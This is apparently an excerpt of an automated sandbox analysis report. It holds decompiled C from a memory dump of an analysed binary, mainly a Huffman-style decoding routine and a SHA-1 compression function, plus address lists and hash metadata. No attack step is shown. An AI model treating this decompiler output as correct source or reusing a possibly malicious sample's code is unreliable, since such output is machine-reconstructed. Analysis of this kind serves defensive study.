										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E0084484D(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E008439F2(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00846d53
0x00846d57
0x00846d5d
0x00846d86
0x00846d89
0x00846d8e
0x00846d91
0x00846d78
0x00846d78
0x00000000
0x00846d93
0x00846d9e
0x00846da1
0x00846da4
0x00846da8
0x00846dac
0x00846db0
0x00846db2
0x00846db4
0x00846db4
0x00846db8
0x00846dc5
0x00846dc5
0x00846dcb
0x00846dce
0x00846dd0
0x00846dd4
0x00000000
0x00000000
0x00846dd6
0x00846dd6
0x00846dd8
0x00847363
0x00847363
0x00847365
0x00000000
0x00847366
0x00846dde
0x00846dec
0x00846dec
0x00846dee
0x00846dfd
0x00846dfd
0x00846e03
0x008476b2
0x008476b2
0x00000000
0x008476b2
0x00000000
0x00846e03
0x00846df0
0x00846df7
0x00000000
0x00000000
0x00000000
0x00846df7
0x00846de3
0x00846de6
0x00000000
0x00000000
0x00000000
0x00846e09
0x00846e09
0x00846e16
0x00846e1b
0x00846e4f
0x00846e4f
0x00846e54
0x00846e5b
0x00846e61
0x00846e67
0x00846e6b
0x00846ea5
0x00846ea6
0x00846ea7
0x00846ea9
0x00846ec2
0x00846ec5
0x00846ecc
0x00846ecf
0x00846ed2
0x00846edb
0x00846ee4
0x00846ee6
0x00846ee9
0x00846eeb
0x00846eeb
0x00846eed
0x00846ef5
0x00846ef8
0x00846efd
0x00846eff
0x00846f18
0x00846f1e
0x0084733a
0x0084733c
0x0084736f
0x00847375
0x00847491
0x00847491
0x0084749a
0x0084749d
0x0084749f
0x008474a3
0x008474b2
0x008474b2
0x008474b5
0x008474ba
0x008474c1
0x008474c7
0x008474cd
0x008474d4
0x00847502
0x00847503
0x00847504
0x00847506
0x00847522
0x00847525
0x0084752c
0x0084752f
0x00847532
0x0084753e
0x0084754a
0x0084754c
0x00847552
0x00847554
0x00847554
0x00847556
0x0084755e
0x0084755e
0x00847561
0x00847564
0x00847575
0x00847578
0x00847578
0x00847566
0x00847566
0x00847566
0x0084757a
0x0084757d
0x0084757f
0x00847584
0x0084758b
0x00847593
0x00847595
0x0084759c
0x0084759f
0x0084759f
0x008475a2
0x008475a2
0x008475a5
0x008475b0
0x008475b4
0x008475b9
0x008475bc
0x008475be
0x00847672
0x00847672
0x00847675
0x00847677
0x00000000
0x00000000
0x0084767d
0x00847683
0x00847689
0x0084768e
0x00847692
0x00847698
0x008476a1
0x008476a4
0x008476a4
0x008476a4
0x008476a9
0x008476a9
0x00846f10
0x00846f10
0x00000000
0x008475c4
0x008475c4
0x008475c6
0x00000000
0x00000000
0x008475cc
0x008475d2
0x008475d4
0x008475da
0x008475de
0x008475e1
0x008475e5
0x00847637
0x0084763a
0x0084726e
0x0084726e
0x00847271
0x00847273
0x00846dbd
0x00846dc1
0x00846dc1
0x00846dc5
0x00846dc5
0x00846dcb
0x00846dce
0x00846dd0
0x00846dd4
0x00000000
0x00000000
0x00000000
0x00846dd4
0x00846dc5
0x0084727c
0x0084727e
0x00847281
0x00847284
0x00000000
0x00000000
0x0084728d
0x00847290
0x00847293
0x00847296
0x00000000
0x00000000
0x0084729f
0x008472a2
0x008472a5
0x008472a8
0x00000000
0x00000000
0x008472b1
0x008472b4
0x008472b7
0x008472ba
0x00000000
0x00000000
0x008472c3
0x008472c6
0x008472c9
0x008472cc
0x00000000
0x00000000
0x008472d5
0x008472d8
0x008472dc
0x008472df
0x008472e2
0x008472eb
0x008472ee
0x008472ee
0x00000000
0x008472e2
0x00847642
0x00847642
0x00847645
0x00847649
0x0084764b
0x0084764f
0x00847654
0x00847658
0x0084765b
0x0084765e
0x00847661
0x00847664
0x00847668
0x00847668
0x00847668
0x0084726a
0x0084726a
0x00000000
0x0084726a
0x008475e7
0x008475ea
0x00000000
0x00000000
0x008475f2
0x008475f2
0x008475f5
0x008475f8
0x008475fb
0x00847600
0x00847606
0x0084760c
0x00847612
0x00847618
0x0084761e
0x00847621
0x00847624
0x00847627
0x0084762a
0x0084762d
0x0084762d
0x0084762d
0x00000000
0x00847632
0x008475be
0x0084750e
0x00847511
0x00847511
0x00847513
0x00000000
0x00000000
0x00847515
0x00847516
0x00847519
0x0084751c
0x00000000
0x00000000
0x00000000
0x0084751e
0x00847520
0x00000000
0x00847520
0x008474d8
0x008474db
0x008474e5
0x008474ed
0x008474f3
0x008474f6
0x00000000
0x00000000
0x00000000
0x00000000
0x008474a5
0x008474a5
0x008474a8
0x008474aa
0x008474ad
0x008474ad
0x008474ad
0x00000000
0x008474a5
0x0084737b
0x0084737e
0x00847382
0x00847384
0x00846e9a
0x00846e9a
0x00000000
0x00846e9a
0x0084738a
0x0084738d
0x00847392
0x00847394
0x0084739e
0x008473a3
0x008473a5
0x00847455
0x00847455
0x00847458
0x0084745a
0x00000000
0x00000000
0x00847460
0x00847466
0x0084746c
0x00847471
0x00847475
0x0084747b
0x00847484
0x00847487
0x00847487
0x00847487
0x00000000
0x0084748c
0x008473ab
0x008473ad
0x00000000
0x00000000
0x008473b3
0x008473b9
0x008473bb
0x008473c1
0x008473c5
0x008473c8
0x008473cc
0x0084741e
0x00847421
0x00000000
0x00000000
0x00847429
0x00847429
0x0084742c
0x0084742e
0x00847432
0x00847437
0x0084743b
0x0084743e
0x00847441
0x00847444
0x00847447
0x0084744b
0x0084744b
0x0084744b
0x00000000
0x00847450
0x008473ce
0x008473d1
0x00000000
0x00000000
0x008473d9
0x008473d9
0x008473dc
0x008473df
0x008473e2
0x008473e7
0x008473ed
0x008473f3
0x008473f9
0x008473ff
0x00847405
0x00847408
0x0084740b
0x0084740e
0x00847411
0x00847414
0x00847414
0x00847414
0x00000000
0x00847419
0x00847342
0x00847346
0x0084734b
0x0084734d
0x00000000
0x00000000
0x00847356
0x0084735b
0x0084735d
0x00000000
0x00000000
0x00000000
0x0084735d
0x00846f24
0x00846f2a
0x00846f2d
0x00846f3e
0x00846f41
0x00846f41
0x00846f2f
0x00846f2f
0x00846f2f
0x00846f43
0x00846f46
0x00846f48
0x00846f72
0x00846f4a
0x00846f4c
0x00846f53
0x00846f5b
0x00846f5d
0x00846f5f
0x00846f67
0x00846f6d
0x00846f6d
0x00846f77
0x00846f7e
0x00846f84
0x00846f8a
0x00846f91
0x00846fbf
0x00846fc0
0x00846fc1
0x00846fc3
0x00846fdf
0x00846fe2
0x00846fe9
0x00846fec
0x00846fef
0x00846ffb
0x00847007
0x00847009
0x0084700f
0x00847011
0x00847011
0x00847013
0x00000000
0x00847013
0x00846fcb
0x00846fce
0x00846fce
0x00846fd0
0x00000000
0x00000000
0x00846fd2
0x00846fd3
0x00846fd6
0x00846fd9
0x00000000
0x00000000
0x00000000
0x00846fdb
0x00846fdd
0x00000000
0x00846f93
0x00846f95
0x00846f98
0x00846fa2
0x00846faa
0x00846fb0
0x00846fb3
0x0084701b
0x0084701b
0x0084701e
0x00847021
0x00847031
0x00847034
0x00847034
0x00847023
0x00847023
0x00847023
0x00847036
0x0084703a
0x0084703d
0x00847041
0x00847043
0x00847047
0x00847049
0x0084717a
0x0084717a
0x00847180
0x00847182
0x00847183
0x00847189
0x0084718b
0x0084718c
0x00847192
0x00847194
0x00847194
0x00847194
0x00847192
0x00847189
0x00847198
0x0084719e
0x008471a4
0x008471a7
0x008471aa
0x008471b5
0x008471b7
0x008471bc
0x008471bf
0x008471c3
0x008471c5
0x008472f6
0x008472f6
0x008472fa
0x008472fd
0x008472ff
0x00000000
0x00000000
0x00847305
0x0084730b
0x0084730f
0x00847315
0x0084731a
0x0084731e
0x00847324
0x0084732d
0x00847330
0x00847330
0x00847330
0x00000000
0x008471cb
0x008471cb
0x008471cd
0x00000000
0x00000000
0x008471d3
0x008471d9
0x008471dc
0x008471e2
0x008471e6
0x008471e9
0x008471ed
0x00847238
0x0084723b
0x00000000
0x00000000
0x0084723f
0x0084723f
0x00847242
0x00847246
0x00847248
0x0084724c
0x00847251
0x00847255
0x00847258
0x0084725b
0x0084725e
0x00847261
0x00847265
0x00847265
0x00847265
0x00000000
0x00847248
0x008471ef
0x008471f2
0x00000000
0x00000000
0x008471f6
0x008471f6
0x008471f9
0x008471fc
0x008471ff
0x00847204
0x0084720a
0x00847210
0x00847216
0x0084721c
0x00847222
0x00847225
0x00847228
0x0084722b
0x0084722e
0x00847231
0x00847231
0x00847231
0x00000000
0x00847236
0x0084704f
0x0084704f
0x00847052
0x0084714d
0x00847156
0x00847160
0x00847164
0x0084716d
0x00847170
0x00847170
0x00847173
0x00847176
0x00847176
0x00000000
0x00847176
0x00847058
0x0084708e
0x0084705a
0x0084705d
0x00847062
0x0084706a
0x00847072
0x00847075
0x0084707d
0x00847084
0x00847089
0x00847089
0x00847093
0x0084709a
0x008470a0
0x008470a6
0x008470ad
0x008470db
0x008470dc
0x008470dd
0x008470e1
0x008470e3
0x00847101
0x00847104
0x00847110
0x00847113
0x00847117
0x0084711c
0x0084712f
0x00847131
0x00847137
0x00847139
0x00847139
0x0084713b
0x00000000
0x0084713b
0x008470eb
0x008470ee
0x008470ee
0x008470f0
0x00000000
0x00000000
0x008470f2
0x008470f3
0x008470f6
0x008470f9
0x00000000
0x00000000
0x00000000
0x008470fb
0x008470fd
0x00000000
0x008470af
0x008470b1
0x008470b4
0x008470be
0x008470c6
0x008470cc
0x008470cf
0x00847143
0x00847146
0x00000000
0x00847146
0x008470ad
0x00847049
0x00846f91
0x00846f0a
0x00846f0d
0x00846f0d
0x00846f0d
0x00000000
0x00846f0d
0x00846eae
0x00846eb1
0x00846eb1
0x00846eb3
0x00000000
0x00000000
0x00846eb5
0x00846eb6
0x00846eb9
0x00846ebc
0x00000000
0x00000000
0x00000000
0x00846ebe
0x00846ec0
0x00000000
0x00846ec0
0x00846e6f
0x00846e72
0x00846e7c
0x00846e84
0x00846e8a
0x00846e8d
0x00846e90
0x00000000
0x00846e90
0x00846e1d
0x00846e20
0x00000000
0x00000000
0x00846e24
0x00846e2f
0x00846e35
0x008476be
0x008476be
0x00000000
0x008476be
0x00846e3b
0x00000000
0x00000000
0x00846e43
0x00846e49
0x00000000
0x00000000
0x00000000
0x00846e49
0x00846dc5
0x00846d91
0x00846d62
0x00846d66
0x00846d6a
0x00846d6e
0x00846d76
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
Instruction ID: 42634597d553a1e97e3edd5126893d0aba7e69b307ce6b4636ed60267ab2d516
Opcode Fuzzy Hash: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
Instruction Fuzzy Hash: 9262017060874E9FC719CF28C8905A9FBE1FB55308F14866EE896CB742E731E965CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0083E9A9, Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0083E9A9(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E0084EA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00855644( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00855644(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00855644( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00855644( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00855644( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00855644(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x0083e9a9
0x0083e9b5
0x0083e9c1
0x0083e9cb
0x0083e9d0
0x0083e9d5
0x0083e9b7
0x0083e9b7
0x0083e9bb
0x0083e9bb
0x0083e9d8
0x0083e9e1
0x0083e9e3
0x0083e9e6
0x0083e9f0
0x0083e9f6
0x0083e9fa
0x0083ea12
0x0083ea1d
0x0083ea1f
0x0083ea21
0x0083ea26
0x0083ea29
0x0083ea2d
0x0083ea31
0x0083ea34
0x0083ea3f
0x0083ea44
0x0083ea5e
0x0083ea63
0x0083ea6e
0x0083ea7b
0x0083ea80
0x0083ea94
0x0083ea9b
0x0083eaa5
0x0083eab2
0x0083eabb
0x0083eacb
0x0083ead7
0x0083ead9
0x0083eae4
0x0083eae9
0x0083eaec
0x0083eb00
0x0083eb07
0x0083eb0e
0x0083eb17
0x0083eb1b
0x0083eb1f
0x0083eb2a
0x0083eb2d
0x0083eb30
0x0083eb3c
0x0083eb4e
0x0083eb51
0x0083eb53
0x0083eb69
0x0083eb71
0x0083eb75
0x0083eb80
0x0083eb92
0x0083eb99
0x0083eb9c
0x0083eba2
0x0083eba4
0x0083eba9
0x0083ebae
0x0083ebc4
0x0083ebcd
0x0083ebcf
0x0083ebd2
0x0083ebd8
0x0083ebde
0x0083ebed
0x0083ebfd
0x0083ebff
0x0083ec05
0x0083ec07
0x0083ec0d
0x0083ec12
0x0083ec16
0x0083ec1c
0x0083ec20
0x0083ec2a
0x0083ec31
0x0083ec36
0x0083ec37
0x0083ec3b
